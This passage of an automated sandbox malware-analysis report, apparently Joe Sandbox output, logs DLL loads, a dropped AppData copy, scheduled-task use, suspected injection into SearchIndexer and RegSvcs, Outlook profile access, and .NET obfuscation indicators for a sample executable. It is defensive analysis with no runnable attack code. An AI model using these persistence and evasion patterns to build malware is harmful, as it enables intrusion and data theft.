            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: tquery.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: mssrch.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: cryptdll.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: esent.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: tquery.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: mssrch.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: cryptdll.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: esent.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeSection loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: JeouiaPf03mHSBH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: JeouiaPf03mHSBH.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: JeouiaPf03mHSBH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: SearchIndexer.pdb source: qRurKwDVhn.exe, 00000010.00000003.2034241645.0000000004673000.00000004.00000001.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000010.00000003.2034639712.000000000473C000.00000004.00000001.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000012.00000003.2269804952.0000000000BDD000.00000004.00000001.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000012.00000003.2270146461.0000000002512000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: RAwd.pdb source: JeouiaPf03mHSBH.exe, snTlRrBza.exe.0.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qRurKwDVhn.exe, 00000010.00000002.2923610433.00000000001EE000.00000002.00000001.01000000.0000000E.sdmp, qRurKwDVhn.exe, 00000012.00000000.2253128743.00000000001EE000.00000002.00000001.01000000.0000000E.sdmp, qRurKwDVhn.exe, 00000014.00000002.2923654418.00000000001EE000.00000002.00000001.01000000.0000000E.sdmp
            Source: Binary string: RAwd.pdbSHA256y source: JeouiaPf03mHSBH.exe, snTlRrBza.exe.0.dr
            Source: Binary string: RegSvcs.pdb, source: SearchIndexer.exe, 00000011.00000002.2927079100.00000000036BC000.00000004.10000000.00040000.00000000.sdmp, SearchIndexer.exe, 00000011.00000002.2924136902.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000014.00000000.2299855317.0000000002ADC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2623311348.000000002E7BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.2096368069.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000002.2926041065.000000000322E000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000003.2105365281.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000002.2926041065.0000000003090000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000003.2096508164.0000000002D2F000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000003.2342536964.00000000032BD000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000002.2449119622.0000000003610000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000002.2449119622.00000000037AE000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000003.2351477186.000000000346A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000006.00000002.2096368069.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000002.2926041065.000000000322E000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000003.2105365281.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000002.2926041065.0000000003090000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000003.2096508164.0000000002D2F000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000003.2342536964.00000000032BD000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000002.2449119622.0000000003610000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000002.2449119622.00000000037AE000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000003.2351477186.000000000346A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: SearchIndexer.pdbUGP source: qRurKwDVhn.exe, 00000010.00000003.2034241645.0000000004673000.00000004.00000001.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000010.00000003.2034639712.000000000473C000.00000004.00000001.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000012.00000003.2269804952.0000000000BDD000.00000004.00000001.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000012.00000003.2270146461.0000000002512000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: RegSvcs.pdb source: SearchIndexer.exe, 00000011.00000002.2927079100.00000000036BC000.00000004.10000000.00040000.00000000.sdmp, SearchIndexer.exe, 00000011.00000002.2924136902.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000014.00000000.2299855317.0000000002ADC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2623311348.000000002E7BC000.00000004.80000000.00040000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, Ckc4Bt89d71YMmb0gd.cs.Net Code: w8x5PFreYB System.Reflection.Assembly.Load(byte[])
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, Ckc4Bt89d71YMmb0gd.cs.Net Code: w8x5PFreYB System.Reflection.Assembly.Load(byte[])
            Source: 0.2.JeouiaPf03mHSBH.exe.63e0000.3.raw.unpack, PingPong.cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.JeouiaPf03mHSBH.exe.34631c0.0.raw.unpack, PingPong.cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, Ckc4Bt89d71YMmb0gd.cs.Net Code: w8x5PFreYB System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeCode function: 0_2_0812E2DD push FFFFFF8Bh; iretd 0_2_0812E2DF
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeCode function: 0_2_081286C8 pushad ; ret 0_2_081286C9
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeCode function: 0_2_08128F48 pushfd ; retf 0_2_08128F49
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00401A9E push 035C916Eh; retf 6_2_00401ABB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004143E5 push edx; retf D011h6_2_00414489
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041F08A push ss; ret 6_2_0041F0BD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00402154 push 380EA568h; ret 6_2_00402159
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004073E3 push 00000041h; ret 6_2_00407412
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004033F0 push eax; ret 6_2_004033F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0040D3AF push edx; ret 6_2_0040D3B4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004014F6 push es; ret 6_2_004014F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00418DA5 pushfd ; retf 6_2_00418DA7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0040CEFA push cs; retf 6_2_0040CEFB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00411E90 push C033AE35h; ret 6_2_00411E95
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E09AD push ecx; mov dword ptr [esp], ecx6_2_014E09B6
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeCode function: 7_2_07BBD63D push FFFFFF8Bh; iretd 7_2_07BBD63F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0111C06D push edi; ret 13_2_0111C06F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010A1366 push eax; iretd 13_2_010A1369
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0111C54D pushfd ; ret 13_2_0111C54E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0111C54F push 8B010A67h; ret 13_2_0111C554
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010D09AD push ecx; mov dword ptr [esp], ecx13_2_010D09B6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0111C9D7 push edi; ret 13_2_0111C9D9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0111BF38 push edi; ret 13_2_0111BF3A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_010A1FEC push eax; iretd 13_2_010A1FED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_01120E7F push edi; ret 13_2_01120E81
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0111BEAD push edi; ret 13_2_0111BEAF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_0111BECE push edi; ret 13_2_0111BEE0
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeCode function: 16_2_0329F24F push ss; ret 16_2_0329F282
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeCode function: 16_2_03287AEA push es; iretd 16_2_03287AEB
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeCode function: 16_2_03292055 push C033AE35h; ret 16_2_0329205A
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeCode function: 16_2_0328D0BF push cs; retf 16_2_0328D0C0
            Source: JeouiaPf03mHSBH.exeStatic PE information: section name: .text entropy: 7.885103240467522
            Source: snTlRrBza.exe.0.drStatic PE information: section name: .text entropy: 7.885103240467522
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, xuMyoRtLSwKEbYyOZUV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KmanmUN8YL', 'slCntFCRP1', 'DGVnkhMcT2', 'WYan3Iku3G', 'c9TnHF8UNW', 'yK5n2WtmH8', 'M9VnfiLSQ6'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, eSNV4R7L83U8700pLS.csHigh entropy of concatenated method names: 'MtcRM9bVic', 'ER3RKPhse6', 'zubRm0OPSY', 'OkyRtdaFLg', 'woXRyfgb99', 'Q5bR6hkon6', 'ppbRcX6GU8', 'wefRoKFYXZ', 'whKRLxrp83', 'LoaRxgykcu'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, Ir9XX8BGVgqJqqBrpk.csHigh entropy of concatenated method names: 'ECUAreMA4w', 'vSUA8cEuOv', 'lKEAUl719V', 'cbxAXWWNkD', 'S7uARD57aH', 'rKuA1NGB9N', 'sx4f5L1iFwUIOxrdu9', 'FSlhgyladT20To6lNg', 'kqwAAymbYP', 'RCfAqlvjMe'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, g0YyKflPy8yK9w4w4q.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'WdRV0fBINl', 'E77VCFWqHB', 'kppVzGGeNi', 'lWbqGLaBsp', 'JrhqAWOIbR', 'AffqVob2na', 'n3Mqq5Ugf4', 'SUwLj23DCSaFwCid0cw'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, xW2e2hhdjSEZvnPwMJ.csHigh entropy of concatenated method names: 'pkyPploLV', 'jHt7Xl4FE', 'V0J9yZNMC', 'oyhi8Tgs5', 'L8AB3U1EA', 'YnkF5CwJm', 'H1F04HXMpEwZ78Gcy4', 'Y8OUtKwlGgGQcldjGC', 'dGyO6RtG4', 'w5cnaaqiq'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, L3orJ2zu7nl0jhEWia.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Ob0h40Y2WA', 'pkQhR9NCW3', 'A1Wh1J4N9T', 'v8AhNDcABZ', 'x2ChOGPWGx', 'NqthhA085q', 'ppHhnnWd72'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, QXr51diiCwgGVrSkMt.csHigh entropy of concatenated method names: 'ovNrY2eA39', 'B6urZg286R', 'YcArPUop1n', 'C0Yr7QAbJM', 'yVcrSbLl7X', 'vder9EuKB8', 'N8NriBkkgy', 'kewrTFBaFd', 'VmrrBML0PE', 'HpZrFdW5Ie'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, WTlef4eAPctGxvi0QH.csHigh entropy of concatenated method names: 'ToString', 'z6y1bSCR37', 'U051yYEgum', 'e9D16bGWZ2', 'Uks1c9QiJJ', 'iG61oaxI4K', 'duN1LY8bCW', 'VsQ1x9Vqds', 'JOv1a3LuhF', 'tjQ1uXouSI'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, Ckc4Bt89d71YMmb0gd.csHigh entropy of concatenated method names: 'VZUqjyYCR1', 'AVmqwM9nI5', 'qaoqIKhr2W', 'm5oqE5ghbR', 'Sq7qJICCCU', 'wbLqskj9IG', 'ArCqruJZWu', 'B1Fq8BJNPV', 'vghqDBWamN', 'JVnqUTt0Qg'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, upI346SlGxxHgqWU2Z.csHigh entropy of concatenated method names: 'RefImHudQi', 'wQXIt8PNw7', 'yLoIkLH2ag', 'AG9I3ZMigM', 'GicIHRIj8A', 'Ky6I2kNiXA', 'zoaIfYtOE9', 'dnUIvpgmyw', 'zWYI0t26Z8', 'ilFIC8Gj1e'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, N4Ll5GXUfMH1RvWFIe.csHigh entropy of concatenated method names: 'THSOwucHsu', 'uFkOIAalH3', 'dcLOEjy1AI', 'J0kOJQlr47', 'YmOOsko1dy', 'KUEOr8I0eN', 'knJO8IFVPL', 'wskODm7qLr', 'RTuOUv777R', 'JSnOXyXsUn'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, EhHNmbwysvM5y7Q7NK.csHigh entropy of concatenated method names: 'Dispose', 'cAJA0FoScx', 't0XVyWAYyO', 'cueQQhtewL', 'iAfACmHiEl', 'bv4AzZtX4i', 'ProcessDialogKey', 'JdGVG7ZuRL', 'YqmVAOVnTh', 'pc4VVV03g6'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, KdbVMg3oVedipeWcRs.csHigh entropy of concatenated method names: 'ASrE7N6av3', 'XTpE9kBpqi', 'RpvETaBDqf', 'BleEBJFivm', 'FDDERubRAj', 'm52E18Uxi6', 'Yn2ENTBN02', 'EJSEO5rH4w', 'bbFEh6Res1', 'CXHEnm0v5H'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, zQBAkGmM1gWTxtBe8p.csHigh entropy of concatenated method names: 'yEPOlKk3yT', 'XMeOyIb1xr', 'qBMO6dUWce', 'YPJOcD6wT0', 'xrGOmhVGa6', 'I07OolUhgu', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, uJSmQAkIQdAqhIUfEM.csHigh entropy of concatenated method names: 'qcArw02tTS', 'WuhrE4PP3I', 'MmIrsjWcJl', 'XxBsCqZ04n', 'cduszkwOrX', 'npNrGvSA0b', 'LEUrAoZQik', 'DburVRMkv7', 'iCBrqZgLFP', 'qvYr5iFCrk'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, En9Hs2FGUX7pUj1W3H.csHigh entropy of concatenated method names: 'sIxsjMBhsk', 'zDysIPLPWM', 'XnusJQp43l', 'bdLsrlqJUt', 'YANs8PxbHZ', 'nZ1JHqhShR', 'wWLJ2egeGi', 'gifJfSN5iY', 'VKCJv5S3Dq', 'gVHJ0d8Zg5'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, dw3ZvYWG4S3ZxXG1Ra.csHigh entropy of concatenated method names: 'mk7hAdwjCo', 'diAhqxKTuw', 'hSuh5nEK4U', 'PNFhw6MfBa', 'o94hIb1QBw', 'ziJhJbU4ku', 'YdThsnSQud', 'qayOfrDUUa', 'DVdOvC1WN0', 'okIO09cAQs'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, tpjUdVuctmg3J3VYWu.csHigh entropy of concatenated method names: 'Xua4TRCSDm', 'uAU4BrG6yG', 'ed74lbsOq7', 'PCD4yZtL1C', 'ily4cyVxSN', 'PrF4oywRMv', 'G834xFxQJV', 'A524anN0or', 'cfa4MEl0uH', 'U9v4blVbNG'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, Gs7da6tvYi6y250LyZF.csHigh entropy of concatenated method names: 'zpFhYrNoNx', 'b6ghZnOKx1', 'UYChPoS7HD', 'iQjh7DNDcS', 'IQjhSUj8Je', 'uN5h9y4oQq', 'ylThif8aIl', 'fmUhTVDZDX', 'ugchBVSq3p', 'UPshFoxFDq'
            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, pWe3CFoJYBpwqoFcvk.csHigh entropy of concatenated method names: 'X2YJS7nG9G', 'iPOJiE0YSB', 'xduE6Vg2Lp', 'jrGEc7Ece4', 'skGEonossi', 'XSOEL9h12p', 'XLCExnkK47', 'c7jEaSBggH', 'OmDEuctc5a', 'yJxEMjYCcZ'
